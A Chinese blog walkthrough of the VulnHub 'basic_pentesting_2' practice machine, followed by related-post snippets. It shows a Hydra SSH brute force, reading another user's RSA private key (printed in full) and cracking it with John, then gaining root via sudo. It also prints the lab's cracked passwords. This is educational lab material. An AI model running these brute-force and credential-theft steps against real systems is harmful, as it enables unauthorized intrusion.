【vulnhub靶场】​basic_pentesting_2靶机​提权

已于 2023-08-03 10:33:09 修改
阅读量295 收藏 1
点赞数 2
分类专栏: vulnhub靶场提权 文章标签: 网络 linux 网络安全 安全性测试
于 2023-08-03 09:17:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46421742/article/details/132075785
版权

#免责声明:
本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。

目录

basic_pentesting_2靶机

主机发现与端口扫描

web信息收集

Hydra爆破jan用户密码

提权

basic_pentesting_2靶机

靶机下载地址 https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz

下载之后,本地解压,用VMware运行该虚拟机。

设置靶机 basic_pentesting_2 与攻击机网络环境,保证在同一局域网,方便都设置成net模式

主机发现与端口扫描

靶机MAC地址

arp-scan -l

探测到目标主机IP地址为192.168.61.151

nmap 192.168.61.0/24

开放了22、80、139、445、8009、8080端口

dirsearch扫描目录,发现 development

web信息收集

访问 192.168.61.151/development

发现两个txt文件,分别打开,内容如下:

dev.txt

j.txt

翻译如下:

大致理解意思是 j 用户可能是个弱密码,可以尝试爆破

22端口开放,大概率是ssh弱口令漏洞

那我们看看该系统下 j 和 k 到底是哪些用户

我们使用命令

 enum4linux 192.168.61.151

尝试找到目标系统其他用户

这里扫描出两个用户,分别是 kay 和 jan 应该就是刚刚的 k 和 j 了

Hydra爆破jan用户密码

刚刚提到jan可能存在ssh弱口令登录,那么我们进行一波爆破操作

使用kali自带的九头蛇(hydra)爆破工具,爆破一下 jan 用户的密码

hydra -l jan -P /usr/share/wordlists/rockyou1.txt 192.168.61.151 ssh

成功爆破出 jan 用户的一个密码,密码为 armando

利用爆破出的密码尝试远程登录

登录成功,找找可用文件进行root提权

在 /home/kay 目录下发现了pass.bak 密码的备份文件,但是普通用户没权限查看

接着在 .ssh 文件目录下发现ssh的私钥和公钥文件且普通用户可以进行查看。

ls -al
cd /home
ls -al
cd kay
ls -al
cd .ssh
ls -al

那我们查看一下私钥文件的内容 cat id_rsa

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75

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
-----END RSA PRIVATE KEY-----

在kali中创建个key文件,将私钥内容复制到其中保存

使用命令

python ssh2john.py key > ssh_login

可以将key创建到ssh2hohn.py文件的目录下

ssh2hohn.py目录在 /usr/share/john

得到了密钥的哈希值

然后使用命令 john --wordlist=/usr/share/wordlists/rockyou1.txt ssh_login 破解

成功拿到密码 beeswax

给key文件赋权

chmod 700 key

输入密码,登录成功

ssh -i key kay@192.168.61.151

cat pass.bak 发现是kay用户登录密码

heresareallystrongpasswordthatfollowsthepasswordpolicy$$

提权

使用刚刚的密码,我们就可以查看可利用的sudo提权

又是ALL

直接sudo su

提权成功

拿到flag!!!

 靶场相关文章:Hack the Basic Pentesting:2 VM (CTF Challenge) - Hacking Articlesb

Yang_peach的博客
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BasicPentesting:从TryHackMe清除基本渗透测试
02-12
基本的沉思 IP: 10.10.251.73 斯坎尼格 开放端口 22 80 139 445 8009 8080 问题与解答 Web服务器上的隐藏目录( development ,可通过GoBuster找到) 用户名(通过enum4linux找到jan和kay ) 密码( jan: armando使用SSH通过Hydra找到) 密码( kay: beeswax在linPEAS中获得带有scalloning的rsa-id后,通过John通过发现的kay: beeswax ) 上一个密码(以下是heresareallystrongpasswordthatfollowsthepasswordpolicy$$在凯氏登录中找到的输入密码heresareallystrongpasswordthatfollowsthepasswordpolicy$$密码) 在ssh服务器中,使用与John一起
java红酒网站源码-pentesting_Notes:pentesting_Notes
06-05
java网站源码Pentesting Pratic Notes(备忘单) 文件检测和提取器: file targetFile strings targetFile | grep flag strings -o targetFile strings -a targetFile strings -t d targetFile strings -f ...
[Vulnhub] basic_pentesting 2
weixin_63231007的博客
07-12 680
目录信息搜集 S2-052漏洞利用 Hydra爆破jan密码(1) vim读取密码 (2) ssh公钥私钥获取身份登录凭据下载链接:Basic Pentesting: 2 ~ VulnHubnmap -sP 192.168.236.0/24 扫描一下靶机ipnetdiscover -i eth0 -r 192.168.1.0/24靶机ip : 192.168.236.138nmap -A 192.168.236.138 扫描一下靶机的具体信息。 收集靶场环境的服务和端口信息我们可以看见139和4...
BASIC-PENTESTING-1 靶机提权
weixin_41082546的博客
08-11 1112
basic-pentesting-1 https://www.vulnhub.com/entry/basic-pentesting-1,216/ 获取ip地址 端口扫描,服务识别 根据服务版本搜索相关漏洞 通过查看漏洞利用代码我们知道该漏洞利用模块在msf中已有 于是使用msf 搜索漏洞模块并利用 use exploit/unix/ftp/proftpd...
Vulnhub靶场训练笔记之——basic_pentesting_2
happy_no_fw的博客
11-29 446
镜像下载:https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz
[Vulnhub] basic_pentesting_1
weixin_46739058的博客
05-08 838
vulnhub靶场basic_pentesting 适合新手,难度较低
信息安全_数据安全_Pentesting ICS 102.pdf
08-22
信息安全_数据安全_Pentesting ICS 102 信息保护 网络安全 web安全 网络安全 安全设计
Learning zANTI2 for Android Pentesting azw3 0分
09-21
Learning zANTI2 for Android Pentesting 英文azw3 本资源转载自网络,如有侵权,请联系上传者删除
Pentesting_Red-Teaming
05-17
Pentesting_Red-Teaming 笔记,提示/技巧/工具/技术的集合,适用于所有渗透测试和团队合作目录页操作系统提示和技巧侦察开发剥削后
Vulnhub靶场渗透-basic_pentesting_1
paidx0
09-22 634
前言 靶机ip(192.168.110.134) 攻击机ip(192.168.110.127) 网络NAT模式 这次的靶场比较简单,却绕了挺大弯的 信息收集 找到隐藏页 简单翻了一下也没啥可以利用的东西,继续扫隐藏页目录 找到一些看似有用其实没啥用的东西,比如WordPress的登录页,文件包含页 这全都是误导,显然我被骗了,一直在爆破登录页和一个一个文件的看,文件数量太多了浪费很多时间 正确解法 重新回到nmap,这次不偷懒,更详细的扫描一下服务的版本号 nmap -A -v 192.168
basic_pentesting_1靶机渗透
weixin_64809022的博客
06-23 682
Python提权: python3 -c 'import pty;pty.spawn("/bin/bash")'
靶场练习第五天~vulnhub靶场basic_pentesting_1
qq_57976347的博客
01-30 727
一、信息收集 1.主机发现 (1)Netdiscover:专用的二层发现工具,拥有主动和被动发现两种方式 具体操作如下,查看一下kali的ip 然后使用命令sudo netdiscover,发现了靶机的ip 2.端口扫描,服务识别 (1)使用nmap -A 开放的端口以及靶场操作系统和版本的探测,使用方法:nmap -A 192.168.101.106 二、后渗透 1.根据服务版本搜索相关漏洞 这里用到msfconsole,关于msfconsole介绍:msfconsole..
Tryhackme-Basic Pentesting
个人博客
09-14 301
Basic Pentesting 文章目录Basic PentestingTask1 Web App Testing and Privilege Escalation Task1 Web App Testing and Privilege Escalation 1.Deploy the machine and connect to our network 2.Find the services exposed by the machine 3.What is the name of the hidden
如何设置渗透测试实验室
2301_77157449的博客
05-04 596
导语:在本文中,我将介绍设置渗透实验室的最快方法。在开始下载和安装之前,必须确保你使用的计算机符合某些渗透测试的要求,这可以确保你可以一次运行多个虚拟机而不会出现任何问题。在本文中,我将介绍设置渗透实验室的最快方法。在开始下载和安装之前,必须确保你使用的计算机符合某些渗透测试的要求,这可以确保你可以一次运行多个虚拟机而不会出现任何问题。确保在BIOS设置中启用了计算机的硬件虚拟化设置,大多数当前的PC应该已启用它,但如果你使用的是较旧的计算机或运行虚拟机时遇到问题,则可能必须启用此设置。
Vulnhub靶机basic_pentesting_2
qq_48904485的博客
02-29 406
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机basic_pentesting_2(10.0.2.7)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz。
BUUCTF -> Basic -> BUU BRUTE 1(详解)
m0_72986388的博客
09-25 2628
我们可以随便输入用户名和密码然后通过burp抓包,得到它的请求包,通过暴力破解从大量数据中获取到正确的用户名和密码。payload设置,从文件中加载爆破字典(没有下载过的需要下载,txt的即可)(这也就是爆破的意义所在,通过遍历一个文件,一个字典中的大量数据来得到一个正确的数据)发现不再是用户名错误,而是密码错误。攻击完成后我们发现长度有217和202,197这几种,且 217数量极少,且对应的payload都相同,点击它。显示登录成功,说明6490是正确的密码,复制flag,输入,这道题就完成了。
2023-2024华为ICT大赛中国区 实践赛网络赛道 全国总决赛 理论部分真题
最新发布
gaogao0305的博客
07-02 357
本文为2023-2024华为ICT大赛 中国区 全国总决赛 实践赛 网络赛道 理论部分考试真题,涵盖数通模块10题、安全模块7题、WLAN模块3题
Python爬虫使用的IP协议主要是什么
qq_42992840的博客
06-26 440
TCP/IP不是一个协议,而是一个协议族的统称,里面包括了IP协议、TCP协议、UDP协议等。在Python爬虫中,主要使用的是TCP/IP协议族中的HTTP协议和HTTPS协议,这两个协议都是基于TCP/IP的。除了HTTP和HTTPS协议外,Python爬虫还可能会使用到其他基于TCP/IP的协议,如FTP(文件传输协议)用于文件下载,SMTP(简单邮件传输协议)用于发送邮件等。总的来说,Python爬虫主要使用的IP协议是TCP/IP协议族中的HTTP和HTTPS协议。
kali linux wifi监听模式,无线渗透教程1:监听无线网络
06-09
好的,我了解您的问题。针对您的问题,我需要说明的是我是一个语言模型,无法进行实际的操作和演示。但是我可以为您提供一些关于Kali Linux的WiFi监听模式和无线渗透方面的知识和资源。 Kali Linux是一款专门用于渗透测试网络安全Linux发行版。在Kali Linux中,可以使用一些工具来进行WiFi监听模式和无线渗透测试。其中,常用的工具包括airmon-ng、airodump-ng和aireplay-ng等。 具体的使用方法可以参考一些相关的教程和资源。以下是一些推荐的资源: 1. Kali Linux官方文档:https://docs.kali.org/ 2. Kali Linux渗透测试教程:https://www.kali.org/docs/pentesting/ 3. Kali Linux无线渗透教程:https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/ 希望以上内容能对您有所帮助。如果您还有其他问题,可以继续提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Yang_peach的博客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值